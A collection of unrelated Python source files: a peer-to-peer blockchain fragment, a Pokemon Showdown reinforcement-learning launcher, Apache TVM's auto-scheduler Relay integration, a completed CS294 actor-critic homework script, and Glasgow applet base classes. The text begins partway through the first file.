new_block = Blockchain.mine_block(data, prev_hash, length)
res.append(new_block)
############### SENDING TO TRACKER & PEERS #############
# broadcast block to all peers except self
def broadcast_block(self, new_block):
self.peer_lock.acquire()
# forming block message
block_msg = {'type': 'BLOCK', 'data': new_block.to_json()}
for p in self.peer_list:
# sending block message
if p != self.self_addr:
self.peer_sock.sendto(json.dumps(block_msg).encode(), p)
print("**Block sent to all peers**")
self.peer_lock.release()
# send entire chain to one peer
def send_blockchain(self, peer):
self.chain_lock.acquire()
# forming chain message
chain_msg = {'type': 'CHAIN', 'data': self.blockchain.to_json()}
self.chain_lock.release()
# send it
print("**Blockchain sent to peer " + peer[0] + "**")
self.peer_sock.sendto(json.dumps(chain_msg).encode(), peer)
# send a request and retrieve block chain from a peer
def send_req(self, peer):
# forming request
req_msg = {'type': 'REQ'}
# send it
print("**Request sent to peer " + peer[0] + "**")
self.peer_sock.sendto(json.dumps(req_msg).encode(), peer)
|
main.py
|
#!/usr/bin/env python3
import logging
import threading
def start_showdown(**kwargs):
try:
import subprocess
print("Starting local Showdown server")
subprocess.run(["node", "Pokemon-Showdown/pokemon-showdown"])
except FileNotFoundError:
pass
import src.geniusect.config as config
from poke_env.player_configuration import PlayerConfiguration
from poke_env.server_configuration import ShowdownServerConfiguration
from src.geniusect.player.reinforcement_learning_player import RLPlayer
if __name__ == "__main__":
if config.get_train_against_ladder():
server_configuration=ShowdownServerConfiguration
validate = False
log_level = logging.INFO
else:
thread = threading.Thread(target=start_showdown)
thread.start()
server_configuration = None
validate = True
log_level = logging.WARNING
env_player = RLPlayer(battle_format="gen8randombattle",
avatar=120,
train=True,
validate=validate,
log_level=log_level,
load_from_checkpoint=config.get_load_from_checkpoint(),
player_configuration=PlayerConfiguration(config.get_bot_username(), config.get_bot_password()),
server_configuration=server_configuration)
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import logging
import json
import threading
import tvm
from tvm import autotvm, te, transform
from tvm.runtime import convert_to_object
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_runtime_codegen
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=3,
config={"relay.backend.use_auto_scheduler": True},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
opt_mod, _ = relay.optimize(mod, target, params)
grc = graph_runtime_codegen.GraphRuntimeCodegen(None, target)
grc.codegen(opt_mod["main"])
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod, params, target, target_host=None, hardware_params=None, include_simple_tasks=False
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
if isinstance(target, str):
target = tvm.target.Target(target)
if isinstance(target_host, str):
target_host = tvm.target.Target(target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(target=call_all_topi_funcs, args=(mod, params, target))
build_thread.start()
build_thread.join()
# query the compile engine to get the number of occurrence of all tasks
engine = relay.backend.compile_engine.get()
use_count_dict = {}
for k, v in engine.items():
use_count_dict[k] = v.use_count
# create search tasks
tasks = []
weights = []
for wkl_key, ccache_key in env.wkl_key_to_ccache_key.items():
dag = ComputeDAG(wkl_key)
tasks.append(SearchTask(dag, wkl_key, target, target_host, hardware_params))
weights.append(use_count_dict[ccache_key] + 1)
# clean the cached lowering results
engine.clear()
return tasks, weights
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
EXTRACT_COMPLEX_TASK_ONLY = 1 # same as EXTRACT_TASK but ignore the task without complex ops
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.wkl_key_to_ccache_key = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, workload_key, ccache_key):
"""Add the workload key of a search task
Parameters
----------
workload_key: str
The workload key of a task
ccache_key: CCacheKey
The corresponding ccache_key of the task
"""
self.wkl_key_to_ccache_key[workload_key] = ccache_key
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get both input and output tensors
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
"""
layout_free_ops = []
inputs = []
visited = set()
def traverse(t):
if t in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t)
for t in outs:
traverse(t)
has_layout_free = len(layout_free_ops) > 0
return inputs + list(outs), has_layout_free
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(outs, has_complex_op):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
outs: List[Tensor]
The output tensors of topi compute functions
has_complex_op: bool
Whether the topi compute function includes at least one complex op.
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
An initial schdule in the tracing mode.
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
io_tensors, has_layout_free = traverse_to_get_io_tensors(outs)
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.hash_key(), io_tensors)
# only enable layout rewrite for cpu backend
target = tvm.target.Target.current()
enable_layout_rewrite = "cpu" in target.keys
env = TracingEnvironment.current
if env is None:
# in the final build mode
state = DispatchContext.current.query(target, key, has_complex_op, dag)
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
elif env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
engine = relay.backend.compile_engine.get()
ccache_key = engine.get_current_ccache_key()
env.add_workload_key(key, ccache_key)
schedule = te.create_schedule([x.op for x in outs])
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if enable_layout_rewrite and has_layout_free:
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag)
if state is None:
return None
# rewrite the layout and update the context for the new dag
dag = ComputeDAG(outs)
new_dag = dag.rewrite_layout_from_state(state)
new_key = json.dumps((new_dag.hash_key(),))
if new_key != key:
dispatch_ctx.update(target, new_key, state)
return te.create_schedule([x.op for x in outs])
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
|
train_ac_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
EPSILON = 1e-8
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR HW2 CODE HERE
with tf.variable_scope(scope):
layer = input_placeholder
for _ in range(n_layers):
layer = tf.layers.dense(layer, size, activation=activation)
output_placeholder = tf.layers.dense(layer, output_size, output_activation)
return output_placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR HW2 CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name="advantage", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
scope = "nn_policy"
if self.discrete:
sy_logits_na = build_mlp(
sy_ob_no, self.ac_dim, scope, self.n_layers, self.size,
activation=tf.nn.relu, output_activation=None)
return sy_logits_na
else:
sy_mean = build_mlp(
sy_ob_no, self.ac_dim, scope, self.n_layers, self.size,
activation=tf.nn.relu, output_activation=None)
sy_logstd = tf.Variable(tf.zeros(self.ac_dim), name='sy_logstd')
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_std: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
with tf.variable_scope("sampled_action"):
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(shape=tf.shape(sy_mean))
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
with tf.variable_scope("log_probability_of_sampled_action"):
if self.discrete:
sy_logits_na = policy_parameters
sy_logprob_n = - tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=sy_ac_na,
logits=sy_logits_na)
else:
sy_mean, sy_logstd = policy_parameters
probabilities = tf.distributions.Normal(sy_mean, tf.exp(sy_logstd)).prob(sy_ac_na)
sy_logprob_n = tf.log(tf.reduce_prod(probabilities, axis=1))
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob[None, :]}) # YOUR HW2 CODE HERE
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
# YOUR CODE HERE
next_obs.append(ob)
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
# YOUR CODE HERE
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
adv_n = []
v_s_tp1_n = self.sess.run(self.critic_prediction, feed_dict={
self.sy_ob_no: next_ob_no})
v_s_t_n = self.sess.run(self.critic_prediction, feed_dict={
self.sy_ob_no: ob_no})
q_n = re_n + self.gamma * v_s_tp1_n * (1-terminal_n)
adv_n = q_n - v_s_t_n
if self.normalize_advantages:
adv_n = np.array(adv_n)
adv_n = (adv_n - adv_n.mean()) / (adv_n.std() + EPSILON) # YOUR_HW2 CODE_HERE
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
nothing
"""
# Use a bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
# YOUR CODE HERE
for i in range(self.num_target_updates):
target_n = []
v_s_tp1_n = self.sess.run(self.critic_prediction, feed_dict={
self.sy_ob_no: next_ob_no})
target_n = re_n + self.gamma * v_s_tp1_n * (1 - terminal_n)
for j in range(self.num_grad_steps_per_target_update):
self.sess.run(self.critic_update_op, feed_dict={
self.sy_target_n: target_n,
self.sy_ob_no: ob_no
})
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call tensorflow operations to:
# (1) update the critic, by calling agent.update_critic
# (2) use the updated critic to compute the advantage by, calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
# YOUR CODE HERE
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
__init__.py
|
import re
import argparse
from abc import ABCMeta, abstractmethod
from ..gateware.clockgen import *
__all__ = ["GlasgowAppletError", "GlasgowApplet", "GlasgowAppletTool"]
class GlasgowAppletError(Exception):
"""An exception raised when an applet encounters an error."""
class GlasgowAppletMeta(ABCMeta):
all_applets = {}
def __new__(metacls, clsname, bases, namespace, name=None, **kwargs):
if name is not None:
if name in metacls.all_applets:
raise NameError(f"Applet {name:r} already exists")
namespace["name"] = name
# Any class that overrides interact() no longer has its superclass' custom REPL, so be
# helpful and reset that attribute.
if "has_custom_repl" not in namespace and "interact" in namespace:
namespace["has_custom_repl"] = False
cls = ABCMeta.__new__(metacls, clsname, bases, namespace, **kwargs)
if name is not None:
metacls.all_applets[name] = cls
return cls
class GlasgowApplet(metaclass=GlasgowAppletMeta):
preview = False
help = "applet help missing"
description = "applet description missing"
required_revision = "A0"
has_custom_repl = False
@classmethod
def add_build_arguments(cls, parser, access):
access.add_build_arguments(parser)
def derive_clock(self, *args, clock_name=None, **kwargs):
try:
return ClockGen.derive(*args, **kwargs, logger=self.logger, clock_name=clock_name)
except ValueError as e:
if clock_name is None:
raise GlasgowAppletError(e)
else:
raise GlasgowAppletError("clock {}: {}".format(clock_name, e))
@abstractmethod
def build(self, target):
pass
@classmethod
def add_run_arguments(cls, parser, access):
access.add_run_arguments(parser)
async def run_lower(self, cls, device, args, **kwargs):
return await super(cls, self).run(device, args, **kwargs)
@abstractmethod
async def run(self, device, args):
pass
@classmethod
def add_interact_arguments(cls, parser):
pass
async def interact(self, device, args, interface):
pass
class GlasgowAppletTool:
def __init_subclass__(cls, applet, **kwargs):
super().__init_subclass__(**kwargs)
applet.tool_cls = cls
cls.applet_cls = applet
cls.logger = applet.logger
@classmethod
def add_arguments(cls, parser):
pass
async def run(self, args):
pass
# -------------------------------------------------------------------------------------------------
import os
import unittest
import functools
import asyncio
import threading
import inspect
import json
